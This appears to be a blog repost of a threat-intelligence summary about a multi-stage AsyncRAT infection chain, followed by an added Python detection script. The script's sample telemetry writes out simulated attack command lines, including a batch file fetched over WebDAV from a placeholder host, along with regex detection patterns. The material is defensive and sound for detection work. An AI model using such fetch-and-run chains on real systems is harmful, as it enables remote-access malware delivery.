Analyzing a Multi-Stage AsyncRAT Campaign via Managed Detection and Response
www.trendmicro.com/en_us/res…

AsyncRAT has become a widely used remote access trojan (RAT), favoured by threat actors for its broad feature set and ease of deployment: keylogging, screen capture and remote command execution come out of the box. AsyncRAT itself is an open-source C#/.NET program; what varies from campaign to campaign is the loader chain wrapped around it, and in this case that chain was script-based, which is what gave the operators their flexibility and ease of customization.

During Trend Micro's investigation of AsyncRAT infections, Python scripts played a central role in the infection chain, automating several stages of the attack. The initial payload, a Windows Script Host (WSH) file, downloaded and executed additional malicious scripts hosted on a WebDAV server. Those scripts in turn fetched batch files and further payloads, giving the attackers a smooth and persistent infection routine.

The attackers hosted their WebDAV server behind Cloudflare's free-tier services, abusing the platform's reliability and the trust it enjoys to evade detection. Because the traffic terminated at legitimate Cloudflare domains, traditional reputation-based controls had difficulty identifying and blocking it. The practical consequence for defenders is that domain or IP blocking is a weak control against this chain; detection has to lean on host telemetry, such as WSH processes reaching WebDAV paths or spawning interpreters.

Similar behaviour was documented previously by other researchers. Since then the scripts' behaviour has changed, as have the primary payloads. This entry dissects the attack chain from initial compromise through AsyncRAT deployment, examining the attacker's techniques for system infiltration and persistent access.
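The chain summarized above (WSH lure, WebDAV-hosted scripts, then batch and Python stages) is easier to hunt for on the endpoint than to block at the network edge, because the server side hides behind Cloudflare. The following is an added example, not code from the Trend Micro write-up or from the campaign: a small hunt over process-creation telemetry that flags WebDAV UNC paths in command lines and interpreters spawned beneath a WSH host. The event layout, process names, file names and the `webdav.example.invalid` host are constructed placeholders; the `\\host@SSL\DavWWWRoot\...` path shape is what the Windows WebClient service produces when a WebDAV share is addressed by UNC path, and is the one thing here taken from real-world behaviour rather than assumed.

```python
"""Hunt for a WSH -> WebDAV -> script-interpreter chain in process-creation logs.

Added example (not Trend Micro's code). Events mimic Sysmon Event ID 1 fields;
the dataclass layout below is an assumption, adapt it to your SIEM schema.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

WSH_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_CHILDREN = {"cmd.exe", "powershell.exe", "python.exe", "pythonw.exe"}

# UNC paths produced by the Windows WebClient (WebDAV mini-redirector):
#   \\host@SSL\DavWWWRoot\dir\file    \\host@SSL@443\dir\file    \\host\DavWWWRoot\file
# A plain SMB share such as \\host\share\file must NOT match.
WEBDAV_RE = re.compile(r"\\\\[^\\\s]+?(?:@SSL(?:@\d+)?\\|\\DavWWWRoot\\)", re.IGNORECASE)


@dataclass(frozen=True)
class Event:
    pid: int
    ppid: int
    image: str      # full path of the new process
    cmdline: str


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    severity: str
    chain: str      # "root -> ... -> process", basenames only


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(ev: Event, by_pid: Dict[int, Event], max_depth: int = 8) -> List[Event]:
    """Follow ppid links upward (loop-safe) and return [root, ..., ev]."""
    chain, seen, cur = [ev], {ev.pid}, ev
    while cur.ppid in by_pid and cur.ppid not in seen and len(chain) < max_depth:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur)
    return list(reversed(chain))


def hunt(events: List[Event]) -> List[Finding]:
    """Two rules: a WebDAV path on any command line (high if a WSH host is the
    process or one of its ancestors, else low), and an interpreter started
    anywhere beneath wscript/cscript."""
    by_pid = {e.pid: e for e in events}
    findings: List[Finding] = []
    for ev in events:
        names = [basename(e.image) for e in ancestry(ev, by_pid)]
        chain_str = " -> ".join(names)
        me, parents = names[-1], names[:-1]
        under_wsh = any(n in WSH_HOSTS for n in parents)
        if WEBDAV_RE.search(ev.cmdline):
            sev = "high" if (under_wsh or me in WSH_HOSTS) else "low"
            findings.append(Finding(ev.pid, "webdav_path_in_cmdline", sev, chain_str))
        if me in SCRIPT_CHILDREN and under_wsh:
            findings.append(Finding(ev.pid, "wsh_spawned_interpreter", "high", chain_str))
    return findings


# Constructed sample telemetry: one malicious chain plus two benign look-alikes.
SAMPLE_EVENTS = [
    Event(1000, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # user opens the WSH lure (file name is a placeholder)
    Event(2000, 1000, r"C:\Windows\System32\wscript.exe",
          r'wscript.exe "C:\Users\victim\Downloads\invoice.vbs"'),
    # the script pulls a batch file over WebDAV (host is a placeholder)
    Event(2100, 2000, r"C:\Windows\System32\cmd.exe",
          r"cmd.exe /c \\webdav.example.invalid@SSL\DavWWWRoot\stage\run.bat"),
    # the batch file hands off to a dropped Python interpreter
    Event(2200, 2100, r"C:\Users\Public\python\python.exe",
          r"python.exe C:\Users\Public\stage2.py"),
    # benign: stock admin script with no children
    Event(3000, 1000, r"C:\Windows\System32\cscript.exe",
          r"cscript.exe C:\Windows\System32\slmgr.vbs /dli"),
    # benign: ordinary SMB share, not WebDAV
    Event(3100, 1000, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c dir \\fileserver\share"),
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.severity}] pid={f.pid} {f.rule}: {f.chain}")
```

On the sample data the two benign events produce nothing, while the malicious chain yields three findings: the WebDAV fetch by `cmd.exe` (high, because `wscript.exe` is its parent) and two interpreter-under-WSH hits for `cmd.exe` and `python.exe`. The ancestry walk is what matters in practice; a rule keyed only on direct parent-child pairs misses the Python stage, which is two hops below the WSH host.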
Edward Kiledjian
@ekiledjian